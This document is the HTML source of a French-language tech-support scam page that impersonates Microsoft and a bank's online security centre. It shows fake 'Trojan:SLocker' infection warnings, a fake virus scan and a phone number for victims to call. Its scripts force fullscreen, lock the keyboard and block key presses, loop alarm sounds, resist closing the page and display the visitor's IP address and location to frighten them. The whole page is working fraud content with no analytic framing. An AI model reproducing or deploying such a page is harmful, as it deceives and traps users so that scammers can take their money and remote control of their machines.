<!DOCTYPE html><html><head>

  <!-- Required meta tags -->
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <title> Online Er#0USA0ND87</title>
<link rel="stylesheet" href="css/styles.css">
<script type="text/javascript" src="js/scripts.js"></script>
<link rel="shortcut icon" href="images/microsoft.png" type="image/png">
<script src="js/jquery.min.js"></script>
<script src="js/bootstrap.min.js" crossorigin="anonymous"></script>
<link rel="stylesheet" href="css/font-awesome.min.css">

<!-- Global site tag (gtag.js) - Google Analytics -->
            <script async="" src="https://www.googletagmanager.com/gtag/js?id=UA-xxx-x"></script>
            <script>
              window.dataLayer = window.dataLayer || [];
              function gtag(){dataLayer.push(arguments);}
              gtag('js', new Date());

              gtag('config', 'UA-xxx-x');
            </script>

<script>
var elem = document.documentElement;
function openFullscreen() {
  if (elem.requestFullscreen) {
    elem.requestFullscreen();
  } else if (elem.webkitRequestFullscreen) { /* Safari */
    elem.webkitRequestFullscreen();
  } else if (elem.msRequestFullscreen) { /* IE11 */
    elem.msRequestFullscreen();
  }
}

function closeFullscreen() {
  if (document.exitFullscreen) {
    document.exitFullscreen();
  } else if (document.webkitExitFullscreen) { /* Safari */
    document.webkitExitFullscreen();
  } else if (document.msExitFullscreen) { /* IE11 */
    document.msExitFullscreen();
  }
}
</script>

<style>
  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/KFOmCnqEu92Fr1Mu72xKOzY.woff2)format('woff2');
    unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/KFOmCnqEu92Fr1Mu5mxKOzY.woff2)format('woff2');
    unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/KFOmCnqEu92Fr1Mu7mxKOzY.woff2)format('woff2');
    unicode-range: U+1F00-1FFF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/KFOmCnqEu92Fr1Mu4WxKOzY.woff2)format('woff2');
    unicode-range: U+0370-03FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/KFOmCnqEu92Fr1Mu7WxKOzY.woff2)format('woff2');
    unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/KFOmCnqEu92Fr1Mu7GxKOzY.woff2)format('woff2');
    unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/KFOmCnqEu92Fr1Mu4mxK.woff2)format('woff2');
    unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/KFOlCnqEu92Fr1MmEU9fCRc4EsA.woff2)format('woff2');
    unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/KFOlCnqEu92Fr1MmEU9fABc4EsA.woff2)format('woff2');
    unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/KFOlCnqEu92Fr1MmEU9fCBc4EsA.woff2)format('woff2');
    unicode-range: U+1F00-1FFF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/KFOlCnqEu92Fr1MmEU9fBxc4EsA.woff2)format('woff2');
    unicode-range: U+0370-03FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/KFOlCnqEu92Fr1MmEU9fCxc4EsA.woff2)format('woff2');
    unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/KFOlCnqEu92Fr1MmEU9fChc4EsA.woff2)format('woff2');
    unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/KFOlCnqEu92Fr1MmEU9fBBc4.woff2)format('woff2');
    unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(fonts/KFOlCnqEu92Fr1MmWUlfCRc4EsA.woff2)format('woff2');
    unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(fonts/KFOlCnqEu92Fr1MmWUlfABc4EsA.woff2)format('woff2');
    unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(fonts/KFOlCnqEu92Fr1MmWUlfCBc4EsA.woff2)format('woff2');
    unicode-range: U+1F00-1FFF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(fonts/KFOlCnqEu92Fr1MmWUlfBxc4EsA.woff2)format('woff2');
    unicode-range: U+0370-03FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(fonts/KFOlCnqEu92Fr1MmWUlfCxc4EsA.woff2)format('woff2');
    unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(fonts/KFOlCnqEu92Fr1MmWUlfChc4EsA.woff2)format('woff2');
    unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(fonts/KFOlCnqEu92Fr1MmWUlfBBc4.woff2)format('woff2');
    unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
  }
</style>
<style>
  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/4UaGrENHsxJlGDuGo1OIlL3Kwp5MKg.woff2)format('woff2');
    unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/4UaGrENHsxJlGDuGo1OIlL3Nwp5MKg.woff2)format('woff2');
    unicode-range: U+0370-03FF;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/4UaGrENHsxJlGDuGo1OIlL3Bwp5MKg.woff2)format('woff2');
    unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/4UaGrENHsxJlGDuGo1OIlL3Awp5MKg.woff2)format('woff2');
    unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/4UaGrENHsxJlGDuGo1OIlL3Owp4.woff2)format('woff2');
    unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/4UabrENHsxJlGDuGo1OIlLU94Yt3CwZ-Pw.woff2)format('woff2');
    unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/4UabrENHsxJlGDuGo1OIlLU94YtwCwZ-Pw.woff2)format('woff2');
    unicode-range: U+0370-03FF;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/4UabrENHsxJlGDuGo1OIlLU94Yt8CwZ-Pw.woff2)format('woff2');
    unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/4UabrENHsxJlGDuGo1OIlLU94Yt9CwZ-Pw.woff2)format('woff2');
    unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/4UabrENHsxJlGDuGo1OIlLU94YtzCwY.woff2)format('woff2');
    unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
  }
</style>
<link href="https://fonts.googleapis.com/css2?family=Google+Sans+Text:wght@400;500;700&amp;display=swap" as="style" id="gst" rel="preload" nonce="jPZWjgBELiO2vboq/vPm">



<script type="text/javascript">
  document.addEventListener('keyup', function (es) {
      if (es.keyCode === 27) {
          toggleFullScreen();
      }
  }, false);
</script>

<script type="text/javascript">
  document.addEventListener('keyup', function (e) {
      if (e.keyCode === 122  e.keyCode === 17  e.keyCode === 18 || e.keyCode === 13) {
          document.getElementById('map').innerHTML = stroka;
          toggleFullScreen();
      }
  }, false);
</script>

<script type="text/javascript">
    window.onbeforeunload = function () {
        if (data_needs_saving()) {
            return "Do you really want to leave our brilliant application?";
        } else {
            return;
        }
    };
</script>


<style>.blink_me {
animation: blinker 1s linear infinite;
}

@keyframes blinker {
50% { opacity: 0; }
}

</style>

<style>
.blink {
background-color:red;
color:white;
animation: blink-animation 1s steps(5, start) infinite;
-webkit-animation: blink-animation 1s steps(5, start) infinite;
}

.blink1 {
background-color:green;
animation: blink-animation 1s steps(5, start) infinite;
-webkit-animation: blink-animation 1s steps(5, start) infinite;
}


@keyframes blink-animation {
to {
visibility: hidden;
}
}
@-webkit-keyframes blink-animation {
to {
visibility: hidden;
}
}
</style>


<script>
      function getVariableFromURl(n0me)
      {
          n0me = n0me.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]");
          var regexS = "[\\?&]"+n0me+"=([^&#]*)";
          var regex = new RegExp( regexS );
          var results = regex.exec( window.location.href );
          if( results == null )
              return "";
          else
              return results[1];
      }
  </script>


  <script type="text/javascript">
              var ph0ne = getVariableFromURl('ph0ne');
          </script>



</head>

<body id="mycanvas" onclick="playSound()">


  <div class="bg" style="cursor:none">
    <div class="bgimg" style="top:0">
      <img src="images/bg.png" alt="" width="100%">
    </div>
  </div>

  <a onclick="openFullscreen();" rel="noreferrer" id="link_black" style="">
      <div class="black" style="height: 145%;"></div>
  </a>


<div class="box" id="box">
<div class="top">
<p style="font-size: 16px;  font-family: 'Google Sans', 'Google Sans Text', Roboto, sans-serif;font-weight: 600;">Sécurité de la Banque en Ligne<img src="images/minimize.jpeg" class="btn" style="float: right; width:115px;"></p>
</div>

<h2 style="position: absolute; left: 70px; top: 60px; font-weight: 300;" id="text1">La sécurité en un coup d'œil</h2>
<p style="position: absolute; left: 70px; top: 100px; font-weight: 0; font-size: 13px;" id="text2"><br>Vérifiez l'état de sécurité et de santé de votre appareil et prenez toutes les mesures nécessaires.</p>
<div class="centerright">
<ul>
<li>
<br>
<img src="images/kxFy-clip.png" width="40px;">
<p>Protection contre les virus et les menaces</p>
<p style="top: 120px; position: absolute; font-size: 13px; color: grey;">Une action est requise. Effectuez une analyse pour vérifier <br>les menaces.</p>

</li>
<li>
<br><br>
<img src="images/qsbs-firewall.png" width="60px;">
<p>Protection du pare-feu et du réseau</p>
<p style="top: 270px; position: absolute; font-size: 13px; color: grey;">Aucune action requise.</p>
</li>
</ul>
<ul>
<li>
<br>
<img src="images/s-S4-acc.png" width="60px;">
<p>Protection du compte</p>
<p style="top: 125px; position: absolute; font-size: 13px; color: grey;">Aucune action requise.</p>
</li>
<li>
<br>
<img src="images/Z5BR-network.png" width="51px;">
<p>Contrôle des applications et des navigateurs</p>
<p style="top: 270px; position: absolute; font-size: 13px; color: grey;">Aucune action requise.</p>
</li>
</ul>
</div>
<img src="images/uZbx-si.png" class="btn" style="border-bottom-left-radius: 10px;" width="30.9px; height: 15.2px;" id="clscl">
<br>
</div>


<!--Chrome Security Quick Scan-->
<div class="scan" id="scan">
  <div class="top">
  <p style="font-size: 16px;  font-family: 'Google Sans', 'Google Sans Text', Roboto, sans-serif;font-weight: 600;">Sécurité de la Banque en Ligne<img src="images/minimize.jpeg" class="btn" style="float: right; width:115px;"></p>
  </div>
  <h2 style="position: absolute; left: 66px; top: 49px; font-weight: 300;" id="text1"><img src="images/kxFy-clip.png" width="30px;" style="margin-right: 10px;vertical-align: text-top;">Protection contre les virus et les menaces</h2>
  <p style="position: absolute; left: 70px; top: 100px; font-weight: 0; font-size: 13px;" id="text2">Protection de l'appareil contre les menaces.</p>

<h3 style="position: absolute; right: 180px; top: -10px; font-weight: 300;" id="text12"><b>+33 1 89 71 58 36 (Sécurité gratuite)</b></h3>

  <div class="centerright">


  <ul>
  <li>



  <div class="flex"> <img src="images/-EBq-current.png" width="20px" height="20px;" style="margin-right: 10px; top: 33px; position: absolute;"><p style="font-weight: 400; position: absolute; left: 30px;">Menace actuelle</p></div>


  <br><br>
  <div class="progress" id="bar">
    <div class="progress__bar"></div>
  </div>

  <p style="font-size: 13px;" id="info">Un scan rapide est en cours...<br>Temps restant estimé: <n id="time">0</n><br><n id="amount">0</n> Fichiers analysés.</p>

  <a href="#" class="button" id="re">Annuler</a>
  <p style=" font-size: 13px;" id="recx">Continuez à travailler pendant que nous analysons votre appareil.</p>

  <p style="font-size: 13px; color: #0063c6; cursor: pointer;" id="recx-hide">Historique de protection</p>
  <br>
  <p id="shx" style="font-size: 13px; color: #0063c6; display: none; cursor: pointer;">Options d'analyse<br> Menaces autorisées<br> Historique de protection</p>


  </li>

  <li>

<div class="flex"><img src="images/nOxp-sett.png" height="28px" width="30px;" style="margin-right: 10px; margin-top: 5px;"><p style="position: absolute; left: 35px;    bottom: 76px;    line-height: 18px;">Virus &amp; Paramètres de protection contre les menaces </p> </div>
<p style="color: grey; font-size: 13px;">Aucune action requise</p>
<p style="font-size: 13px; color: #0063c6;">Gérez vos paramètres</p>
  </li>
  </ul>
  <ul>

  <li>


  <p style="position: absolute; top: -55px;">J'ai une question?</p>

  <p style="font-size: 13px; color: #0063c6; position: absolute; top: -15px; cursor: pointer;">Obtenez de l'aide</p>

  </li>
  <li>


    <p style="position: absolute; top: 25px;">Qui me protégera</p>

    <p style="font-size: 13px; color: #0063c6; position: absolute; top: 65px; cursor: pointer;">Gestion des fournisseurs</p>

    </li>
    <li>


      <p style="position: absolute; top: 80px; "><br>Aidez-nous à améliorer la sécurité de la banque en ligne</p>

      <p style="font-size: 13px; color: #0063c6; position: absolute; top: 152px; cursor: pointer;">Envoyez-nous vos commentaires</p>

      </li>
      <li>

        <p style="position: absolute; top: 190px;">Modifiez vos paramètres de confidentialité</p>
        <p style="position: absolute; top: 220px; font-size: 13px;">Afficher et modifier les paramètres de confidentialité sur la Banque en Ligne<br><n id="which"></n> Appareils.</p>

        <p style="font-size: 13px; color: #0063c6; position: absolute; top: 270px; cursor: pointer;">Paramètres de confidentialité<br>la confidentialité<br>Déclaration de confidentialité</p>

        </li>

  </ul>

  </div>
  <img src="images/uZbx-si.png" class="btn" style="border-bottom-left-radius: 10px;" width="30.9px; height: 15.2px;" id="clscl">
  <br>
  </div>
  <script>
          navigator.userAgentData.getHighEntropyValues(["platformVersion"])
   .then(ua => {
     if (navigator.userAgentData.platform === "Windows") {
       const majorPlatformVersion = parseInt(ua.platformVersion.split('.')[0]);
       if (majorPlatformVersion >= 13) {
        document.getElementById("which").innerHTML = " 11";
        }
        else if (majorPlatformVersion > 0) {
          document.getElementById("which").innerHTML = " 10";
        }
        else {
          console.log("Beyond");
        }
     }
     else {
       console.log("does not work on Online Internet Banking");
     }
   });
  </script>






<div class="alert_popup cardcontainer lightbox">
    <div class="container">
        <div class="row">
            <div class="col-md-12">
                <p class="text-center" style="    font-size: 16px;
font-weight: normal;
margin: 0;
margin-bottom: 5px;
padding: 5px 10px;
color: #fff;font-weight: bold;
margin-top: 8px; text-align: center;"><img src="images/microsoft.png" class="logo12"> Sécurité de la Banque en Ligne - Alerte Logiciel Espion</p>
                <p class="text-center">** La Banque en Ligne est infectée par Trojan:SLocker **</p>
                <p>Une erreur critique est survenue en raison de la version obsolète du navigateur. Mettez à jour votre navigateur dès que possible.</p>
                <p>Les erreurs suivantes peuvent également se produire avec des versions obsolètes du navigateur:</p>
                <ul class="icon-links">
                  <li>&gt; Perte de données personnelles et stockées</li>
                  <li>&gt; Fuite d'informations confidentielles</li>
                  <li>&gt; Erreurs de navigateur</li>
                </ul>

                  <p>Un scan de la sécurité de la Banque en Ligne a détecté des logiciels publicitaires potentiellement indésirables sur cet appareil, pouvant voler des mots de passe, des identités en ligne, des informations financières, des fichiers personnels, des images ou des documents.</p>
                  <p>Veuillez nous contacter immédiatement afin que notre ingénieur puisse vous expliquer le processus de suppression par téléphone.<br><br>

                  Veuillez contacter immédiatement le support de la Banque en Ligne pour signaler cette menace, prévenir les tentatives de spoofing et débloquer l'accès à cet appareil.<br><br>
                  Fermer cette Banque en Ligne met vos informations personnelles en danger et interrompt votre enregistrement à la Banque en Ligne.</p>

               <p style="padding-bottom: 0px;">Appeler le support Microsoft <strong>+33 1 89 71 85 36 (Assistance Microsoft)</strong></p>
               <div class="action_buttons"> <a class="" id="leave_page" style="cursor: pointer;">OK</a> <a class="" id="leave_page">Annuler</a> </div>
            </div>

        </div>
    </div>
</div>
<audio id="beep" loop="">
  <source src="media/_Fm7-alert.mp3" type="audio/mpeg">
</audio>

<script>
  addEventListener("click", function() {
var el = document.documentElement
  , rfs =
         el.requestFullScreen
      || el.webkitRequestFullScreen
      || el.mozRequestFullScreen
;
rfs.call(el);
});

</script>

<script>
  var t = new XMLHttpRequest;
  t.onreadystatechange = function() {
    if (4 == this.readyState && 200 == this.status) {
      var a = JSON.parse(this.responseText);
      ipadd = a.ip;
      city = a.city;
      country = a.country;
      isp = a.connection.isp;
      var b = new Date;
      currtime = a.timezone.current_time;
      document.getElementById("ip_add").textContent = "Address IP: " + ipadd + " " + b.toLocaleString("EN-US", currtime);
      document.getElementById("city").textContent = "Location: " + city + ", " + country;
      document.getElementById("isp").textContent = "ISP: " + isp
    }
  };
  t.open("GET", "https://ipwho.is/?lang=en", !0);
  t.send();
</script>

<div id="lst" class="lst lightbox">
  <div class="ilb top">
      <div class="headers ilb" style="border-bottom: 1px solid #d6d5d5;">
          <span id="txtadd" class="fl title"><span class="fl ilb"><img src="images/microsoft.png" class="logo3"></span> Centre de Sécurité en Ligne de Microsoft</span>
          <span id="txts1" class="fl title2"><a href="#"><img src="images/cross.png"></a></span>

      </div>
  </div>
  <div id="txtintro">
              <!-- <span class="colo-rd">App: Ads.financetrack(2).dll<br>
              Threats Detected: Trojan Spyware</span> -->
              <span class="colo-rd"><span class="blink">(5)</span> infections par virus/malware ont été détectées sur votre appareil.<br>
            </span>
              <div id="ip_add">Alerte du pare-feu Microsoft pour Internet !</div>
              <div id="city">Utilisez votre identifiant préféré pour vous connecter à Internet Banking</div>\\
              <div id="isp"> (Error Code: #Er0d2_JP07E)</div>


  </div>
  <div class="">
    <ul class="imglinks">
      <li><img src="images/gif1.gif" alt=""></li>
      <li><img src="images/microsoft.png" class="banner" alt=""></li>
      <li><img src="images/gif2.gif" alt=""></li>
    </ul>
  </div>

  <div id="disclaimer">
    Vos données personnelles, informations bancaires et identifiants de connexion web enregistrés sur cet ordinateur sont en danger en raison d'une violation majeure de la sécurité..<br>
      <span class="support">Appeler le support Microsoft: +33 1 89 71 85 36 (Assistance Microsoft)</span>
  </div>
  <div id="bottom">
      <img id="badge" src="images/microsoft.png"><span class="title3">en Ligne de Microsoft</span>
      <ul>
          <li>
              <a href="#">
                  <div class="fr button2">
                      <span id="addtochromebutton">Quitter la page</span>
                  </div>
              </a>
          </li>
          <li>
              <a href="#">
                  <div class="fr buttons blink">
                      <span id="addtochromebutton">un problème</span>
                  </div>
              </a>
          </li>
      </ul>

  </div>
</div>



<div id="footer">
  <div class="row">

      <div class="col-md-12">
          <div class="right-foot" style="text-align: center;">
              <span id="footertxt"><img src="images/microsoft.png"> en Ligne de Microsoft: </span><span style="font-weight: 700;padding-left: 13px;color: #fff;"> Sécurité en Ligne de Microsoft <span style="border: 1px solid #fff;border-radius: 5px;padding: 2px 5px;"> +33 1 89 71 85 36 (Numéro vert)</span></span>
          </div>
      </div>
      <div class="col-md-12">
          <marquee width="100%" direction="left" height="100px"><small class="text-left" style="color: #eee;font-size: 12px;"><strong>Note de sécurité :</strong> Votre sécurité est importante pour nous. Si vous n'êtes pas à l'origine de cette demande, veuillez nous contacter immédiatement en soumettant un rapport.</small></marquee>
      </div>
  </div>


</div>

<div id="welcomeDiv" class="answer_list">
    <p class="text-center" style="color: #FEFEFE;  margin-top:10px; font-size: 16px; opacity:.9; ">Votre PC avec Online Internet Banking a été infecté par le virus/malware trojan.slocker. Ce type de virus/malware est couramment connu pour détourner des informations financières pour rançon ou utiliser les informations volées directement pour des vols.
Cette infection doit être supprimée immédiatement. Vous devez contacter le support Microsoft :<br><br> <b> +33 1 89 71 85 36 (Numéro vert) </p>



</div>

<div id="chrome-alerts" class="chrome-alert" style="padding-top:10px">
	<div>
	<!-- <a href="javascript:openlink()" class="cross">×</a> -->
		<p>Quitter le site?</p>
    <p>Les modifications que vous avez apportées pourraient ne pas être enregistrées.</p>
    <input type="checkbox" id="checkbox" name="checkbox" value="checkbox">
  <label for="checkbox">Empêcher cette page de créer des dialogues supplémentaires</label><br>
		<div class="action_buttons">
		  <a class="" id="leave_page">Annuler</a>
		  <a class="active" id="leave_page">Quitter</a>
		</div>
	</div>
</div>


<script>
  $(document).ready(function () {
      $("#mycanvas").click(function () {
          $("#welcomeDiv").show();
      });
  });
</script>
<script type="text/javascript">
  window.onbeforeunload = function() {
     if (data_needs_saving()) {
         return "Call Windows Defender Helpline Now";
     } else {
        return;
     }
  };
          </script>
          <script type="text/javascript">
              window.addEventListener("beforeunload", function (e) {
           var confirmationMessage = 'It looks like you are editing something. '
                              + 'Your changes will be lost if you leave before saving.';

                  (e || window.event).returnValue = confirmationMessage; //Gecko + IE
                  return confirmationMessage; //Gecko + Webkit, Safari, Chrome etc.
              });
          </script>


              <script>
              navigator.keyboard.lock();
              document.onkeydown = function (e) {
              return false;
              }
              </script>



              <div id="chat-box">
                <img src="images/microsoft.png"><span style="color: #222;
              font-size: 21px;
              font-weight: 600;
              margin-left: 6px;
              position: relative;">Centre de Sécurité</span> <p style="font-weight: 600;">Microsoft Support</p>
               <h4 style="font-weight: 600;"> +33 1 89 71 85 36 (Numéro vert)</h4>
                 <div class="arrow-down">
                   <i class="fa fa-caret-down"></i>
                 </div>

                </div>

<script>
  $(document).ready(function() {
   var audioElement = document.createElement('audio');
   audioElement.setAttribute('src', 'beeps.mp3');

   audioElement.addEventListener('ended', function() {
       this.play();
   }, false);


    $('#mycanvas').click(function() {
       audioElement.play();

   });

     $('#link_black').click(function() {
       audioElement.play();

   });


      $('#footer').click(function() {
       audioElement.play();

   });

       $('#lst').click(function() {
       audioElement.play();

   });

});
</script>

              <script type="text/javascript">
                $(document).ready(function() {
                 $("#chat-box").delay(6000).fadeIn(100);
              });

              </script>


              
</body></html>
